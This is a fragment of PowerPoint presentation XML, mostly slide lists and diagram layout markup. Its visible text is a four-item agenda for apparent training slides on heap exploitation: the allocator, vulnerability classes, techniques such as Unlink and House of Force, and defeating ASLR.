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1"/>
  </p:notesMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="440" r:id="rId2"/>
    <p:sldId id="546" r:id="rId3"/>
    <p:sldId id="547" r:id="rId4"/>
    <p:sldId id="555" r:id="rId5"/>
    <p:sldId id="556" r:id="rId6"/>
    <p:sldId id="557" r:id="rId7"/>
    <p:sldId id="558" r:id="rId8"/>
    <p:sldId id="559" r:id="rId9"/>
    <p:sldId id="560" r:id="rId10"/>
    <p:sldId id="565" r:id="rId11"/>
    <p:sldId id="561" r:id="rId12"/>
    <p:sldId id="562" r:id="rId13"/>
    <p:sldId id="563" r:id="rId14"/>
    <p:sldId id="564" r:id="rId15"/>
    <p:sldId id="566" r:id="rId16"/>
    <p:sldId id="548" r:id="rId17"/>
    <p:sldId id="567" r:id="rId18"/>
    <p:sldId id="569" r:id="rId19"/>
    <p:sldId id="568" r:id="rId20"/>
    <p:sldId id="570" r:id="rId21"/>
    <p:sldId id="687" r:id="rId22"/>
    <p:sldId id="549" r:id="rId23"/>
    <p:sldId id="550" r:id="rId24"/>
    <p:sldId id="428" r:id="rId25"/>
    <p:sldId id="572" r:id="rId26"/>
    <p:sldId id="573" r:id="rId27"/>
    <p:sldId id="571" r:id="rId28"/>
    <p:sldId id="551" r:id="rId29"/>
    <p:sldId id="552" r:id="rId30"/>
    <p:sldId id="578" r:id="rId31"/>
    <p:sldId id="579" r:id="rId32"/>
    <p:sldId id="580" r:id="rId33"/>
    <p:sldId id="581" r:id="rId34"/>
    <p:sldId id="582" r:id="rId35"/>
    <p:sldId id="583" r:id="rId36"/>
    <p:sldId id="584" r:id="rId37"/>
    <p:sldId id="585" r:id="rId38"/>
    <p:sldId id="586" r:id="rId39"/>
    <p:sldId id="588" r:id="rId40"/>
    <p:sldId id="575" r:id="rId41"/>
    <p:sldId id="587" r:id="rId42"/>
    <p:sldId id="589" r:id="rId43"/>
    <p:sldId id="590" r:id="rId44"/>
    <p:sldId id="591" r:id="rId45"/>
    <p:sldId id="592" r:id="rId46"/>
    <p:sldId id="593" r:id="rId47"/>
    <p:sldId id="597" r:id="rId48"/>
    <p:sldId id="596" r:id="rId49"/>
    <p:sldId id="446" r:id="rId50"/>
    <p:sldId id="544" r:id="rId51"/>
    <p:sldId id="594" r:id="rId52"/>
    <p:sldId id="600" r:id="rId53"/>
    <p:sldId id="595" r:id="rId54"/>
    <p:sldId id="599" r:id="rId55"/>
    <p:sldId id="683" r:id="rId56"/>
    <p:sldId id="598" r:id="rId57"/>
    <p:sldId id="680" r:id="rId58"/>
    <p:sldId id="602" r:id="rId59"/>
    <p:sldId id="468" r:id="rId60"/>
    <p:sldId id="469" r:id="rId61"/>
    <p:sldId id="603" r:id="rId62"/>
    <p:sldId id="601" r:id="rId63"/>
    <p:sldId id="604" r:id="rId64"/>
    <p:sldId id="605" r:id="rId65"/>
    <p:sldId id="553" r:id="rId66"/>
    <p:sldId id="681" r:id="rId67"/>
    <p:sldId id="686" r:id="rId68"/>
    <p:sldId id="607" r:id="rId69"/>
    <p:sldId id="608" r:id="rId70"/>
    <p:sldId id="610" r:id="rId71"/>
    <p:sldId id="611" r:id="rId72"/>
    <p:sldId id="612" r:id="rId73"/>
    <p:sldId id="613" r:id="rId74"/>
    <p:sldId id="685" r:id="rId75"/>
    <p:sldId id="615" r:id="rId76"/>
    <p:sldId id="609" r:id="rId77"/>
    <p:sldId id="684" r:id="rId78"/>
    <p:sldId id="618" r:id="rId79"/>
    <p:sldId id="617" r:id="rId80"/>
    <p:sldId id="619" r:id="rId81"/>
    <p:sldId id="620" r:id="rId82"/>
    <p:sldId id="616" r:id="rId83"/>
    <p:sldId id="623" r:id="rId84"/>
    <p:sldId id="621" r:id="rId85"/>
    <p:sldId id="624" r:id="rId86"/>
    <p:sldId id="625" r:id="rId87"/>
    <p:sldId id="626" r:id="rId88"/>
    <p:sldId id="627" r:id="rId89"/>
    <p:sldId id="629" r:id="rId90"/>
    <p:sldId id="631" r:id="rId91"/>
    <p:sldId id="632" r:id="rId92"/>
    <p:sldId id="633" r:id="rId93"/>
    <p:sldId id="636" r:id="rId94"/>
    <p:sldId id="637" r:id="rId95"/>
    <p:sldId id="638" r:id="rId96"/>
    <p:sldId id="472" r:id="rId97"/>
    <p:sldId id="498" r:id="rId98"/>
    <p:sldId id="635" r:id="rId99"/>
    <p:sldId id="630" r:id="rId100"/>
    <p:sldId id="640" r:id="rId101"/>
    <p:sldId id="641" r:id="rId102"/>
    <p:sldId id="652" r:id="rId103"/>
    <p:sldId id="653" r:id="rId104"/>
    <p:sldId id="654" r:id="rId105"/>
    <p:sldId id="655" r:id="rId106"/>
    <p:sldId id="656" r:id="rId107"/>
    <p:sldId id="639" r:id="rId108"/>
    <p:sldId id="642" r:id="rId109"/>
    <p:sldId id="657" r:id="rId110"/>
    <p:sldId id="643" r:id="rId111"/>
    <p:sldId id="658" r:id="rId112"/>
    <p:sldId id="645" r:id="rId113"/>
    <p:sldId id="646" r:id="rId114"/>
    <p:sldId id="647" r:id="rId115"/>
    <p:sldId id="659" r:id="rId116"/>
    <p:sldId id="650" r:id="rId117"/>
    <p:sldId id="651" r:id="rId118"/>
    <p:sldId id="661" r:id="rId119"/>
    <p:sldId id="662" r:id="rId120"/>
    <p:sldId id="648" r:id="rId121"/>
    <p:sldId id="663" r:id="rId122"/>
    <p:sldId id="664" r:id="rId123"/>
    <p:sldId id="665" r:id="rId124"/>
    <p:sldId id="666" r:id="rId125"/>
    <p:sldId id="667" r:id="rId126"/>
    <p:sldId id="668" r:id="rId127"/>
    <p:sldId id="670" r:id="rId128"/>
    <p:sldId id="671" r:id="rId129"/>
    <p:sldId id="672" r:id="rId130"/>
    <p:sldId id="674" r:id="rId131"/>
    <p:sldId id="673" r:id="rId132"/>
    <p:sldId id="675" r:id="rId133"/>
    <p:sldId id="676" r:id="rId134"/>
    <p:sldId id="677" r:id="rId135"/>
    <p:sldId id="678" r:id="rId136"/>
    <p:sldId id="508" r:id="rId137"/>
    <p:sldId id="510" r:id="rId138"/>
    <p:sldId id="509" r:id="rId139"/>
    <p:sldId id="511" r:id="rId1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ureen Robinson" initials="" lastIdx="3" clrIdx="0"/>
  <p:cmAuthor id="1" name="Jason Taylor" initials="JT [2]" lastIdx="1" clrIdx="1"/>
  <p:cmAuthor id="2" name="Jason Taylor" initials="JT [10]" lastIdx="1" clrIdx="2"/>
  <p:cmAuthor id="3" name="Jason Taylor" initials="JT [7]" lastIdx="1" clrIdx="3"/>
  <p:cmAuthor id="4" name="Jason Taylor" initials="JT [9]"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DD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04" autoAdjust="0"/>
    <p:restoredTop sz="84926" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0" snapToObjects="1">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="174" d="100"/>
          <a:sy n="174" d="100"/>
        </p:scale>
        <p:origin x="1088"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10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10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5C88F0-B491-45D1-9C23-78FF9AF7FA7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25326BE-441B-4349-A95E-911D3C8E2D93}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US"/>
            <a:t>Introduction to the Allocator (chunks, bins, etc.) </a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{10ED73AF-A585-442E-9D58-8F69000DFCC4}" type="parTrans" cxnId="{D67B4C9C-D329-40F9-81B2-EC97B3D96713}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{7925A1B5-7010-4BE8-8275-2696DBCCC314}" type="sibTrans" cxnId="{D67B4C9C-D329-40F9-81B2-EC97B3D96713}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{1D004D8C-0090-4855-B961-357563AF4359}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US"/>
            <a:t>Vulnerability Classes (use after free, overflow, double free) </a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{8639C9B4-DED0-45D3-A6C9-5B5ABFE65B52}" type="parTrans" cxnId="{9D9CBA03-AAA6-4837-88CE-81FECADF3C75}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{43EBC6EC-6EC5-4922-940B-62080A7A5382}" type="sibTrans" cxnId="{9D9CBA03-AAA6-4837-88CE-81FECADF3C75}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A462F534-0C53-4EA9-84CA-34D743DB303F}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US"/>
            <a:t>Techniques (Fd Poison, Unlink, House of Force…) </a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{61CC8F71-D038-483A-B884-0C7848E5B679}" type="parTrans" cxnId="{3F12FF2A-4FFB-4591-910A-DB8E1528DDB9}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{B3F59E0F-8911-480D-8887-B829B421392E}" type="sibTrans" cxnId="{3F12FF2A-4FFB-4591-910A-DB8E1528DDB9}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{3F7E58B4-025F-43FD-92FC-DD63A06AC95C}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US"/>
            <a:t>Information leaks/defeating ASLR</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C99D157E-8494-456C-AA15-D67D1EB495D0}" type="parTrans" cxnId="{5D824B3D-0912-41AB-B377-EBB68BECA8DD}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{4E302E08-A64F-491D-B4D7-C7D4F4038874}" type="sibTrans" cxnId="{5D824B3D-0912-41AB-B377-EBB68BECA8DD}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{0F364806-75F7-4C3A-8E5B-CDE35F99C8D4}" type="pres">
      <dgm:prSet presAssocID="{6C5C88F0-B491-45D1-9C23-78FF9AF7FA7F}" presName="root" presStyleCnt="0">
        <dgm:presLayoutVars>
          <dgm:dir/>
          <dgm:resizeHandles val="exact"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{C5FD62B9-B4C2-43D8-813C-3967EA94F633}" type="pres">
      <dgm:prSet presAssocID="{A25326BE-441B-4349-A95E-911D3C8E2D93}" presName="compNode" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{D8AF373A-0F92-48E9-8265-301DD8910506}" type="pres">
      <dgm:prSet presAssocID="{A25326BE-441B-4349-A95E-911D3C8E2D93}" presName="bgRect" presStyleLbl="bgShp" presStyleIdx="0" presStyleCnt="4"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{41CB7FAE-D146-49B6-8CC5-08B3C1BA6EF5}" type="pres">
      <dgm:prSet presAssocID="{A25326BE-441B-4349-A95E-911D3C8E2D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rbage"/>
        </a:ext>
      </dgm:extLst>
    </dgm:pt>
    <dgm:pt modelId="{BD51E9CC-59EE-4E66-84AF-C71A4BC3621E}" type="pres">
      <dgm:prSet presAssocID="{A25326BE-441B-4349-A95E-911D3C8E2D93}" presName="spaceRect" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{B8D9B8C9-0A2B-40A8-9331-BB40445DC1BA}" type="pres">
      <dgm:prSet presAssocID="{A25326BE-441B-4349-A95E-911D3C8E2D93}" presName="parTx" presStyleLbl="revTx" presStyleIdx="0" presStyleCnt="4">
        <dgm:presLayoutVars>
          <dgm:chMax val="0"/>
          <dgm:chPref val="0"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{1E8A4C1C-86FA-45EA-B499-BE69DDE48759}" type="pres">
      <dgm:prSet presAssocID="{7925A1B5-7010-4BE8-8275-2696DBCCC314}" presName="sibTrans" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{E7031449-73A7-4520-8C92-1040B70825D7}" type="pres">
      <dgm:prSet presAssocID="{1D004D8C-0090-4855-B961-357563AF4359}" presName="compNode" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{CC042912-3B7C-4F7B-99FA-F146F2A6F950}" type="pres">
      <dgm:prSet presAssocID="{1D004D8C-0090-4855-B961-357563AF4359}" presName="bgRect" presStyleLbl="bgShp" presStyleIdx="1" presStyleCnt="4"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{CAC4D5D5-A81A-4F61-9B06-F8B9DDFA427B}" type="pres">
      <dgm:prSet presAssocID="{1D004D8C-0090-4855-B961-357563AF435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14AC411C-2149-444B-8657-037D7A5D82A1}" type="pres">
      <dgm:prSet presAssocID="{1D004D8C-0090-4855-B961-357563AF4359}" presName="spaceRect" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{6B2F8A12-8F7E-473D-A2E0-444A7AF4CFC6}" type="pres">
      <dgm:prSet presAssocID="{1D004D8C-0090-4855-B961-357563AF4359}" presName="parTx" presStyleLbl="revTx" presStyleIdx="1" presStyleCnt="4">
        <dgm:presLayoutVars>
          <dgm:chMax val="0"/>
          <dgm:chPref val="0"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{D07CA04D-16F9-416E-9908-B5768D93D188}" type="pres">
      <dgm:prSet presAssocID="{43EBC6EC-6EC5-4922-940B-62080A7A5382}" presName="sibTrans" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{FE098F07-D610-4E16-81DD-2D24D11A3302}" type="pres">
      <dgm:prSet presAssocID="{A462F534-0C53-4EA9-84CA-34D743DB303F}" presName="compNode" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{04E8DDB2-D5FD-4759-8AF7-4622C55AF0D5}" type="pres">
      <dgm:prSet presAssocID="{A462F534-0C53-4EA9-84CA-34D743DB303F}" presName="bgRect" presStyleLbl="bgShp" presStyleIdx="2" presStyleCnt="4"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{EEA38D49-E286-4FA3-99E5-2F2340A10930}" type="pres">
      <dgm:prSet presAssocID="{A462F534-0C53-4EA9-84CA-34D743DB30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nger"/>
        </a:ext>
      </dgm:extLst>
    </dgm:pt>
    <dgm:pt modelId="{36531050-D517-4A2A-9BC7-35D4526BED6F}" type="pres">
      <dgm:prSet presAssocID="{A462F534-0C53-4EA9-84CA-34D743DB303F}" presName="spaceRect" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{D0FFF0D1-4A23-418F-A282-3117EA1DC2F7}" type="pres">
      <dgm:prSet presAssocID="{A462F534-0C53-4EA9-84CA-34D743DB303F}" presName="parTx" presStyleLbl="revTx" presStyleIdx="2" presStyleCnt="4">
        <dgm:presLayoutVars>
          <dgm:chMax val="0"/>
          <dgm:chPref val="0"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{5A931A70-AA91-4BA6-98F8-ACC82FBA7674}" type="pres">
      <dgm:prSet presAssocID="{B3F59E0F-8911-480D-8887-B829B421392E}" presName="sibTrans" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{74182234-963B-4AEA-BB43-F97C7C58C10F}" type="pres">
      <dgm:prSet presAssocID="{3F7E58B4-025F-43FD-92FC-DD63A06AC95C}" presName="compNode" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{AC42A769-9035-43C8-86E3-07B01B6EBD8E}" type="pres">
      <dgm:prSet presAssocID="{3F7E58B4-025F-43FD-92FC-DD63A06AC95C}" presName="bgRect" presStyleLbl="bgShp" presStyleIdx="3" presStyleCnt="4"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{D4D55A12-10BB-4371-8F01-164DAD6D4F79}" type="pres">
      <dgm:prSet presAssocID="{3F7E58B4-025F-43FD-92FC-DD63A06AC9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ter"/>
        </a:ext>
      </dgm:extLst>
    </dgm:pt>
    <dgm:pt modelId="{8B9555E3-DEFA-451F-8CCE-ABAD05A9DE06}" type="pres">
      <dgm:prSet presAssocID="{3F7E58B4-025F-43FD-92FC-DD63A06AC95C}" presName="spaceRect" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{A4C8257E-F815-46A4-8A00-25C28B2F807B}" type="pres">
      <dgm:prSet presAssocID="{3F7E58B4-025F-43FD-92FC-DD63A06AC95C}" presName="parTx" presStyleLbl="revTx" presStyleIdx="3" presStyleCnt="4">
        <dgm:presLayoutVars>
          <dgm:chMax val="0"/>
          <dgm:chPref val="0"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
  </dgm:ptLst>
  <dgm:cxnLst>
    <dgm:cxn modelId="{9D9CBA03-AAA6-4837-88CE-81FECADF3C75}" srcId="{6C5C88F0-B491-45D1-9C23-78FF9AF7FA7F}" destId="{1D004D8C-0090-4855-B961-357563AF4359}" srcOrd="1" destOrd="0" parTransId="{8639C9B4-DED0-45D3-A6C9-5B5ABFE65B52}" sibTransId="{43EBC6EC-6EC5-4922-940B-62080A7A5382}"/>
    <dgm:cxn modelId="{3F12FF2A-4FFB-4591-910A-DB8E1528DDB9}" srcId="{6C5C88F0-B491-45D1-9C23-78FF9AF7FA7F}" destId="{A462F534-0C53-4EA9-84CA-34D743DB303F}" srcOrd="2" destOrd="0" parTransId="{61CC8F71-D038-483A-B884-0C7848E5B679}" sibTransId="{B3F59E0F-8911-480D-8887-B829B421392E}"/>
    <dgm:cxn modelId="{D1D61034-008C-49E1-B3BD-3BF9EBBF452F}" type="presOf" srcId="{3F7E58B4-025F-43FD-92FC-DD63A06AC95C}" destId="{A4C8257E-F815-46A4-8A00-25C28B2F807B}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{BA700439-D1AE-425A-AFD5-2EB612B86BBD}" type="presOf" srcId="{A25326BE-441B-4349-A95E-911D3C8E2D93}" destId="{B8D9B8C9-0A2B-40A8-9331-BB40445DC1BA}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{5D824B3D-0912-41AB-B377-EBB68BECA8DD}" srcId="{6C5C88F0-B491-45D1-9C23-78FF9AF7FA7F}" destId="{3F7E58B4-025F-43FD-92FC-DD63A06AC95C}" srcOrd="3" destOrd="0" parTransId="{C99D157E-8494-456C-AA15-D67D1EB495D0}" sibTransId="{4E302E08-A64F-491D-B4D7-C7D4F4038874}"/>
    <dgm:cxn modelId="{D6DE653E-6CF2-49D3-89D5-00DA83774ADF}" type="presOf" srcId="{1D004D8C-0090-4855-B961-357563AF4359}" destId="{6B2F8A12-8F7E-473D-A2E0-444A7AF4CFC6}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{D67B4C9C-D329-40F9-81B2-EC97B3D96713}" srcId="{6C5C88F0-B491-45D1-9C23-78FF9AF7FA7F}" destId="{A25326BE-441B-4349-A95E-911D3C8E2D93}" srcOrd="0" destOrd="0" parTransId="{10ED73AF-A585-442E-9D58-8F69000DFCC4}" sibTransId="{7925A1B5-7010-4BE8-8275-2696DBCCC314}"/>
    <dgm:cxn modelId="{ED089FB7-C33D-4800-91A7-BFB87A6ACA7D}" type="presOf" srcId="{A462F534-0C53-4EA9-84CA-34D743DB303F}" destId="{D0FFF0D1-4A23-418F-A282-3117EA1DC2F7}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{3702B1C9-D714-448C-A93F-56AD8D39AC5A}" type="presOf" srcId="{6C5C88F0-B491-45D1-9C23-78FF9AF7FA7F}" destId="{0F364806-75F7-4C3A-8E5B-CDE35F99C8D4}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{D6F7FFF9-9488-4133-ADB6-69FEE52B659D}" type="presParOf" srcId="{0F364806-75F7-4C3A-8E5B-CDE35F99C8D4}" destId="{C5FD62B9-B4C2-43D8-813C-3967EA94F633}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{77229190-CC1F-4070-8252-B75DEB404BEE}" type="presParOf" srcId="{C5FD62B9-B4C2-43D8-813C-3967EA94F633}" destId="{D8AF373A-0F92-48E9-8265-301DD8910506}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{42876ACE-0821-431E-91BB-76A0922C11BC}" type="presParOf" srcId="{C5FD62B9-B4C2-43D8-813C-3967EA94F633}" destId="{41CB7FAE-D146-49B6-8CC5-08B3C1BA6EF5}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{17B3D4BE-42A3-4316-9A9B-06D1B1101A8F}" type="presParOf" srcId="{C5FD62B9-B4C2-43D8-813C-3967EA94F633}" destId="{BD51E9CC-59EE-4E66-84AF-C71A4BC3621E}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{FCC48855-A08A-4083-9797-857FF8114588}" type="presParOf" srcId="{C5FD62B9-B4C2-43D8-813C-3967EA94F633}" destId="{B8D9B8C9-0A2B-40A8-9331-BB40445DC1BA}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{D940949F-E89B-4AB6-A63E-A6C3185B95B3}" type="presParOf" srcId="{0F364806-75F7-4C3A-8E5B-CDE35F99C8D4}" destId="{1E8A4C1C-86FA-45EA-B499-BE69DDE48759}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{41B71D58-AE82-4400-BD34-8AA260D8B076}" type="presParOf" srcId="{0F364806-75F7-4C3A-8E5B-CDE35F99C8D4}" destId="{E7031449-73A7-4520-8C92-1040B70825D7}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{F75E4496-6C10-42CA-BCE2-05152029A1E5}" type="presParOf" srcId="{E7031449-73A7-4520-8C92-1040B70825D7}" destId="{CC042912-3B7C-4F7B-99FA-F146F2A6F950}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{BF0791D8-1A4F-45D6-A9B5-F495579E150E}" type="presParOf" srcId="{E7031449-73A7-4520-8C92-1040B70825D7}" destId="{CAC4D5D5-A81A-4F61-9B06-F8B9DDFA427B}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{21A11D41-16BE-4808-8D68-C0B45759A952}" type="presParOf" srcId="{E7031449-73A7-4520-8C92-1040B70825D7}" destId="{14AC411C-2149-444B-8657-037D7A5D82A1}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{677488E4-EA6D-4960-A5B3-CD7E8A0F6F52}" type="presParOf" srcId="{E7031449-73A7-4520-8C92-1040B70825D7}" destId="{6B2F8A12-8F7E-473D-A2E0-444A7AF4CFC6}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{94E9BF22-0C1D-4A8B-9714-E74D023A40E2}" type="presParOf" srcId="{0F364806-75F7-4C3A-8E5B-CDE35F99C8D4}" destId="{D07CA04D-16F9-416E-9908-B5768D93D188}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{0DAE4364-EA37-477C-8C5E-0C72AF011043}" type="presParOf" srcId="{0F364806-75F7-4C3A-8E5B-CDE35F99C8D4}" destId="{FE098F07-D610-4E16-81DD-2D24D11A3302}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{1BF36701-C662-4A68-96FD-F115324581F8}" type="presParOf" srcId="{FE098F07-D610-4E16-81DD-2D24D11A3302}" destId="{04E8DDB2-D5FD-4759-8AF7-4622C55AF0D5}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{FF52E023-A159-48C8-9E3F-B45D345D9929}" type="presParOf" srcId="{FE098F07-D610-4E16-81DD-2D24D11A3302}" destId="{EEA38D49-E286-4FA3-99E5-2F2340A10930}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{C502704A-6D37-48D4-A6BF-19E7079AE994}" type="presParOf" srcId="{FE098F07-D610-4E16-81DD-2D24D11A3302}" destId="{36531050-D517-4A2A-9BC7-35D4526BED6F}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{12990C0B-499B-4F3F-AF3B-57BE9E7183A5}" type="presParOf" srcId="{FE098F07-D610-4E16-81DD-2D24D11A3302}" destId="{D0FFF0D1-4A23-418F-A282-3117EA1DC2F7}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{E2E6BE46-B5B6-41BD-BF23-AD87D8B1FE3D}" type="presParOf" srcId="{0F364806-75F7-4C3A-8E5B-CDE35F99C8D4}" destId="{5A931A70-AA91-4BA6-98F8-ACC82FBA7674}" srcOrd="5" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{181A0D36-F8F3-4CA2-87DE-8A76281B0E20}" type="presParOf" srcId="{0F364806-75F7-4C3A-8E5B-CDE35F99C8D4}" destId="{74182234-963B-4AEA-BB43-F97C7C58C10F}" srcOrd="6" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{E0DF649D-DB8D-4990-B75A-C1247D599CC2}" type="presParOf" srcId="{74182234-963B-4AEA-BB43-F97C7C58C10F}" destId="{AC42A769-9035-43C8-86E3-07B01B6EBD8E}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{ACAD8172-59BD-49E7-B03A-CC967AB4FDC6}" type="presParOf" srcId="{74182234-963B-4AEA-BB43-F97C7C58C10F}" destId="{D4D55A12-10BB-4371-8F01-164DAD6D4F79}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{FAEEF495-E5C8-4C64-AF35-17C34E2EC94F}" type="presParOf" srcId="{74182234-963B-4AEA-BB43-F97C7C58C10F}" destId="{8B9555E3-DEFA-451F-8CCE-ABAD05A9DE06}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
